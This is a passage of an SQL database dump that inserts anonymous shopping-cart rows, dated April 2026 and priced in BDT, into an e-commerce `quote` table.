(1012, 1, '2026-04-12 19:21:44', '2026-04-12 19:21:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1013, 1, '2026-04-12 19:21:45', '2026-04-12 19:21:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1014, 1, '2026-04-12 19:21:46', '2026-04-12 19:21:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1015, 1, '2026-04-12 19:21:48', '2026-04-12 19:21:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1016, 1, '2026-04-12 19:21:49', '2026-04-12 19:21:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1017, 1, '2026-04-12 19:21:50', '2026-04-12 19:21:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1018, 1, '2026-04-12 19:42:24', '2026-04-12 19:42:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1019, 1, '2026-04-12 22:39:35', '2026-04-12 22:39:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1020, 1, '2026-04-13 04:33:26', '2026-04-13 04:33:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1021, 1, '2026-04-13 04:52:43', '2026-04-13 04:52:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1022, 1, '2026-04-13 06:52:20', '2026-04-13 06:52:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1023, 1, '2026-04-13 08:56:28', '2026-04-13 08:56:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1024, 1, '2026-04-13 13:22:05', '2026-04-13 13:22:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1025, 1, '2026-04-13 14:06:21', '2026-04-13 14:06:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1026, 1, '2026-04-13 15:11:11', '2026-04-13 15:11:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1027, 1, '2026-04-13 15:11:48', '2026-04-13 15:11:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1028, 1, '2026-04-13 18:19:01', '2026-04-13 18:19:10', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1029, 1, '2026-04-13 18:41:49', '2026-04-13 18:41:49', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1030, 1, '2026-04-13 23:18:31', '2026-04-13 23:18:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1031, 1, '2026-04-13 23:19:20', '2026-04-13 23:19:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1032, 1, '2026-04-14 06:27:04', '2026-04-14 06:27:04', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1033, 1, '2026-04-14 07:31:16', '2026-04-14 07:31:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1034, 1, '2026-04-14 08:34:41', '2026-04-14 08:34:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1035, 1, '2026-04-14 09:24:43', '2026-04-14 09:24:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1036, 1, '2026-04-14 10:37:34', '2026-04-14 10:37:34', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1037, 1, '2026-04-14 15:54:38', '2026-04-14 15:54:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1038, 1, '2026-04-14 17:34:50', '2026-04-14 17:34:50', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1039, 1, '2026-04-14 17:54:58', '2026-04-14 17:54:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1040, 1, '2026-04-14 18:15:46', '2026-04-14 18:15:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1041, 1, '2026-04-15 00:11:40', '2026-04-15 00:11:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1042, 1, '2026-04-15 03:07:55', '2026-04-15 03:07:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1043, 1, '2026-04-15 08:36:16', '2026-04-15 08:36:18', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1044, 1, '2026-04-15 13:28:33', '2026-04-15 13:28:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(1045, 1, '2026-04-15 18:11:14', '2026-04-15 18:11:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1046, 1, '2026-04-15 22:52:28', '2026-04-15 22:52:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1047, 1, '2026-04-16 01:37:27', '2026-04-16 01:37:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1048, 1, '2026-04-16 05:02:09', '2026-04-16 05:02:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1049, 1, '2026-04-16 08:12:17', '2026-04-16 08:12:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1050, 1, '2026-04-16 08:49:44', '2026-04-16 08:49:46', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1051, 1, '2026-04-16 09:54:52', '2026-04-16 09:54:52', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1052, 1, '2026-04-16 10:08:30', '2026-04-16 10:08:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1053, 1, '2026-04-16 10:16:19', '2026-04-16 10:16:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1054, 1, '2026-04-16 10:39:40', '2026-04-16 10:39:40', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1055, 1, '2026-04-16 14:08:56', '2026-04-16 14:08:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1056, 1, '2026-04-16 14:46:10', '2026-04-16 14:46:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1057, 1, '2026-04-16 16:02:37', '2026-04-16 16:02:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1058, 1, '2026-04-16 17:36:36', '2026-04-16 17:36:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1059, 1, '2026-04-16 23:10:54', '2026-04-16 23:11:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1060, 1, '2026-04-17 02:39:28', '2026-04-17 02:39:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1061, 1, '2026-04-17 06:20:19', '2026-04-17 06:20:55', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1062, 1, '2026-04-17 11:18:56', '2026-04-17 11:18:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1063, 1, '2026-04-17 12:05:33', '2026-04-17 12:05:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1064, 1, '2026-04-17 13:46:25', '2026-04-17 13:46:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1065, 1, '2026-04-17 18:59:25', '2026-04-17 18:59:25', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1066, 1, '2026-04-17 21:18:52', '2026-04-17 21:18:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1067, 1, '2026-04-17 23:05:35', '2026-04-17 23:05:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1068, 1, '2026-04-18 02:22:40', '2026-04-18 02:22:40', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1069, 1, '2026-04-18 04:43:36', '2026-04-18 04:43:51', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1070, 1, '2026-04-18 10:03:28', '2026-04-18 10:03:28', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
